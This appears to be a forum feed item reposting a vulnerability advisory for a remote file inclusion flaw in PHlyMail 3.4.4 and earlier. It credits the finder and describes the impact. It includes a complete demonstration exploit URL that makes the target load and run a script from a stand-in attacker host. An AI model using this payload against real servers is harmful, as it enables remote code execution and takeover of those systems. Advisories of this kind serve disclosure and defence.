/hvaonline/posts/list/13.html JForum - http://www.jforum.net PHlyMail Include File Bug in '_PM_['path']['handler']' Parameter Lets Remote Users Execute Arbitrary Version(s): 3.4.4 and prior versions Description: A vulnerability was reported in PHlyMail. A remote user can include and execute arbitrary code on the target system. The 'handlers/email/mod.listmail.php' script does not properly validate user-supplied input in the '_PM_['path']['handler']' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service. A demonstration exploit URL is provided: +http://[target]/[phlymail_path]/handlers/email/mod.listmail.php?_PM_[path][handler]=[http://www.myevilsite.com/evil_scripts.txt] Kacper (a.k.a Rahim) discovered this vulnerability. Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.]]> /hvaonline/posts/list/3035.html#16990 /hvaonline/posts/list/3035.html#16990 GMT